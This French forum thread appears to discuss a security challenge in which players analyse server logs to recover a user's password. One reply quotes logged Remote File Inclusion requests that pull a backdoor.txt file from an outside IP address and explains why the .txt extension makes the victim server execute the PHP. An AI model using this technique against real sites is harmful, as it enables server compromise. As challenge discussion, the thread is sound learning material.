[kevin56140]

Effectivement @The Lsd j'ai lu et j'ai compris enfin je pense.

Je pense être sur une piste concernant le mot de passe John, je pense qu'il s'est fait "cramé" ai-je bon ou ai-je tort ?

[kevin56140]

Un petit Up

[kevin56140]

Bonjour à tous,

Je me permets de revenir posté ici, car je suis toujours bloqué pour obtenir le mdp de john.

J'ai donc plusieurs questions :
/* moderated par the lsd : chuuut, un peu moins fort ! iirc, tu pars pas trop mal, mais faut pas le dire aux autres !*/
ça fait deux semaines que je suis dessus :'(.

[kevin56140]

C'est RE-moi

@TheLSD est-il possible d'avoir par mp le message que j'ai posté hier sans la modération car je ne me souviens plus qu'est ce que j'ai posté.

Désolé pour le dérangement.

[Asteriksme]

si tu te souviens plus de ce que t'as fait à la limite le mieux est de recommencer 

[kevin56140]

Je sais ce que j'ai fait mais je me souviens plus de ce que j'ai posté ce n'est pas la même chose.

[Elliot]

Bonjour,

Pourquoi la backdoor est un fichier txt ? J'imagine que ce n'est pas une information importante pour la résolution de l'épreuve mais juste pas curiosité j'aurais bien aimé savoir !

Bonne journée.

[sandelan]

Salut

Pourquoi la backdoor est un fichier txt ?

Si tu fais référence aux fichiers avec une extention py alors il s'agit tout simplement de scripts écrits en langage python.

Ce langage est très utilisé surtout, sous linux et je ne peux que te conseiller de l'étudier.

[Elliot]

Non je ne parlais pas de ça mais de la backdoor.txt que l'on peut voir dans les logs !

[sandelan]

Dans les logs ok !
Alors je persiste, c'est peut être une backdoor écrite en python.
pour la lancer : python backdoor.txt
Quelqu'un a une autre idée ?

[pixis]

Salut,
la backdoor est incluse via une RFI (Remote File Inclusion). On le voit sur deux lignes de log :

[...] GET index.php?page=http://199.230.171.106/backdoor.txt [...]
[...] GET index.php?page=http://199.230.171.106/backdoor.txt&file=pass.php [...]

Le but, c'est que le contenu php de la backdoor soit executé sur le serveur de l'attaqué, et non pas sur le serveur de l'attaquant. Si l'extension était .php, alors le code serait exécuté par le serveur 199.230.171.106 et le résultat serait inclus là où la variable $_GET['page'] est incluse.
Ici, le comportement souhaité, c'est que le code php lui même soit inclus en dur dans la page index.php du serveur attaqué. Donc on veut que la réponse à l'appel http://199.230.171.106/backdoor.? renvoie le code php lui même. Quoi de mieux que de l'appeler backdoor.txt ?
Ensuite, comme c'est index.php et qu'il y a le code php brut de backdoor.txt, alors ça sera exécuté à ce moment là, par le serveur attaqué.

C'est pour cela que l'extension .txt est choisie.

[Elliot]

D'accord je comprends mieux ! Je n'avais pas pensé que le script pouvait s’exécuter chez l'attaquant au lieu de la victime.
J'aime bien cette épreuve elle semble beaucoup plus réaliste que les premières 

[Pech]

Heuu... sans vouloir me méler de ce qui me regarde pas, on est pas dans les afterwards là, non ?

[pixis]

Non, mais ça ne donne pas d'indices/informations qui aident à la résolution de l'épreuve, donc pas de soucis

PS : Ces deux lignes de log ont déjà été citées dans ce forum

[Pech]

Non, mais ça ne donne pas d'indices/informations qui aident à la résolution de l'épreuve, donc pas de soucis

PS : Ces deux lignes de log ont déjà été citées dans ce forum

OK pour moi
J'avoue ne pas avoir lu tous les messages ici, uniquement les tous derniers.